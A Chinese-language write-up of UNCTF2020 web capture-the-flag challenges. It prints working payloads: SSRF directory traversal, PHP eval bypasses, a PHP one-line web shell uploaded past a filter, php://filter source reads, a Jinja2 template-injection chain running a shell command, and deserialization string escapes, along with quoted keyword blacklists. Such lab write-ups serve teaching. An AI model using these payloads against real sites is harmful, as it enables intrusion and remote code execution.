當(dāng)前位置:首頁(yè) > IT技術(shù) > Web編程 > 正文

UNCTF2020 | Web Wp
2021-10-20 10:29:06


Web

0x01:easy_ssrf

UNCTF2020 | Web Wp_web

代碼很簡(jiǎn)單,參數(shù)中要有unctf.com,而且過(guò)濾了??php|file|zip|bzip|zlib|base|data??,導(dǎo)致很多協(xié)議用不了,查了查資料發(fā)現(xiàn)涉及到SSRF file_get_contents函數(shù)都是利用的file協(xié)議等,一開(kāi)始也沒(méi)思路要怎么繞過(guò)去。

然后查了一篇師傅的博客記載了一個(gè)SSRF的一個(gè)黑魔法:

當(dāng)PHP的 file_get_contents() 函數(shù)在遇到不認(rèn)識(shí)的偽協(xié)議頭時(shí)候會(huì)將偽協(xié)議頭當(dāng)做文件夾,造成目錄穿越漏洞,這時(shí)候只需不斷往上跳轉(zhuǎn)目錄即可讀到根目錄的文件。這個(gè)方法可以在SSRF的眾多協(xié)議被ban的情況下來(lái)進(jìn)行讀取文件

UNCTF2020 | Web Wp_安全_02

發(fā)現(xiàn)確實(shí)可以造成目錄穿越,直接讀取下flag

UNCTF2020 | Web Wp_反序列化_03


0x02:babyeval

UNCTF2020 | Web Wp_php_04

過(guò)濾了帶括號(hào)的函數(shù),可以使用??echo??進(jìn)行輸出內(nèi)容,通過(guò)include包含??flag.php??,再輸出變量即可(感覺(jué)是非預(yù)期,因?yàn)閛b_start函數(shù)沒(méi)有用到)

payload:

?a=include "flag.php";echo $flag;

ob_start([string output_callback])- 打開(kāi)輸出緩沖區(qū),所有的輸出信息不在直接發(fā)送到瀏覽器,而是保存在輸出緩沖區(qū)里面,可選得回調(diào)函數(shù)用于處理輸出結(jié)果信息。

這道題設(shè)置的是輸出信息中不能存在flag,所以可以利用編碼繞過(guò)

?a=echo `base64 flag.php`;

UNCTF2020 | Web Wp_web_05

也可以通過(guò)include+偽協(xié)議去讀取

?a=include 'php://filter/read=convert.base64-encode/resource=./flag.php';

0x03:ezphp

UNCTF2020 | Web Wp_安全_06

bool類型的true跟任意字符串可以弱類型相等。因此我們可以構(gòu)造bool類型的序列化數(shù)據(jù) ,無(wú)論比較的值是什么,結(jié)果都為true

payload:

<?php
error_reporting(0);
$shy='';
$shy=array("username"=>1,"password"=>1);
echo var_dump($shy);
echo var_dump(serialize($shy));

$shy='';
$shy=array("username"=>true,"password"=>true);
echo var_dump($shy);
echo var_dump(serialize($shy));
?>

UNCTF2020 | Web Wp_反序列化_07

0x04:easy_upload

UNCTF2020 | Web Wp_php_08

上傳一個(gè)php文件,發(fā)現(xiàn)過(guò)濾了以下內(nèi)容

perl|pyth|ph|auto|curl|base||>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!

查了資料,發(fā)現(xiàn)是De1CTF2020的原題,既然過(guò)濾了ph,可以使用換行進(jìn)行繞過(guò)

UNCTF2020 | Web Wp_flask_09

還過(guò)濾了??>??,可以使用

<?=eval($_POST['cmd']);
#繞過(guò)<?php ?>限制的一句話

UNCTF2020 | Web Wp_web_10

上傳進(jìn)去,蟻劍連接之后便可以在根目錄中發(fā)現(xiàn)flag

0x05:L0vephp

提示是查看頁(yè)面源碼

UNCTF2020 | Web Wp_反序列化_11

一開(kāi)始也不知道是什么編碼,查了查字資料發(fā)現(xiàn)是base85(也稱為Ascii85)

?

在線解一下,得到

UNCTF2020 | Web Wp_php_12

提示讀取一下源碼,嘗試一下偽協(xié)議讀取,發(fā)現(xiàn)

?action=php://filter/read=convert.base64-encode/resource=index.php

UNCTF2020 | Web Wp_反序列化_13

發(fā)現(xiàn)被過(guò)濾了,再試試其他方法,發(fā)現(xiàn)換成以下兩種都可以

?action=php://filter/read=string.toupper|string.rot13/resource=flag.php
?action=php://filter/convert.quoted-printable-encode/resource=flag.php

UNCTF2020 | Web Wp_安全_14

解密得到

<!--?PHP

$FLAG = "UNCTF{7HIS_IS_@_F4KE_F1A9}";

//HINT:316E4433782E706870
?-->

得到1nD3x.php,得到以下源碼

<?php 

error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];

$_=array('@','~','^','&','?','<','>','*','`','+','-',''','"','\\','/'); 
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);

if (strlen($code)>16){
die('Too long');
}

foreach ($blacklist1 as $blacklisted) { 
if (preg_match ('/' . $blacklisted . '/m', $code)) { 
die('WTF???'); 
    } 
} 

foreach ($blacklist2 as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('Sry,try again');
    }
}

@eval($code);
?>

之前無(wú)命令進(jìn)行構(gòu)造,長(zhǎng)度沒(méi)有限制的這么短,而且這道題過(guò)濾了很多,之前的異或什么的都走不通,查資料看了P神的這篇文章,發(fā)現(xiàn)了新的思路,真的是tttttql

?

按照P神的payload即可獲取到flag,有空要仔細(xì)研究一下。

UNCTF2020 | Web Wp_反序列化_15

0x06:easyflask

一看名字就猜測(cè)是不是??ssti??,進(jìn)去之后需要先以admin用戶登陸進(jìn)去,發(fā)現(xiàn)存在login和register路由,以admin用戶注冊(cè)一個(gè)賬號(hào)即可獲取到/secret_route_you_do_not_know路由

UNCTF2020 | Web Wp_php_16

http://697940e0-e21b-4cad-8504-a3834c796ea7.node1.hackingfor.fun/secret_route_you_do_not_know?guess={{config}}

在該路由下存在ssti漏洞,但是過(guò)濾以下字符

' " [ ] _

可以使用??|attr和request.args.xx??來(lái)繞過(guò)下劃線和引號(hào),??request.args??存儲(chǔ)著請(qǐng)求參數(shù)以及其值的字典,接下來(lái)就是構(gòu)造payload即可

{{()|attr(request.args.class)|attr(request.args.bases)|attr(request.args.subclasses)()|attr(request.args.a)(117)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)(request.args.e)(request.args.f)|attr(request.args.g)()}}&class=__class__&bases=__base__&subclasses=__subclasses__&a=__getitem__&b=__init__&c=__globals__&d=get&e=popen&f=cat flag.txt&g=read

UNCTF2020 | Web Wp_php_17

0x07:easyunserialize

UNCTF2020 | Web Wp_flask_18

先拉到本地測(cè)試一下,修改一下源碼,讓結(jié)果回顯出來(lái)

UNCTF2020 | Web Wp_反序列化_19

觀察代碼也很簡(jiǎn)單,用戶名沒(méi)有限制,密碼必須為easy,才可以得到flag,就先正常反序列化一個(gè)這樣的payload

UNCTF2020 | Web Wp_web_20

O:1:"a":3:{s:5:"uname";s:5:"1emon";s:8:"password";s:4:"easy";}

其中??";s:8:"password";s:4:"easy";}??是29個(gè)字符,下面就是一個(gè)數(shù)學(xué)問(wèn)題了,過(guò)濾后字符變多了四個(gè),把??";s:8:"password";s:4:"easy";}??給擠出去,閉合之前的值??1??即可

strlen(challenge(9)*n+29)=strlen(easychallenge(13)*n)
9*n+29=13*n
4n=29+3
n=>8

多出三個(gè)字符,前面肯定是不能添加的,所以可以放在最后面,根據(jù)反序列化的特點(diǎn)超出的部分并不會(huì)被反序列化成功,所以不會(huì)產(chǎn)生任何影響,payload如下:

?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}shy

總結(jié)

還有幾道題當(dāng)時(shí)沒(méi)做出來(lái),等這幾天事忙了完,再回頭了做下!

本文摘自 :https://blog.51cto.com/u

開(kāi)通會(huì)員,享受整站包年服務(wù)立即開(kāi)通 >
推薦內(nèi)容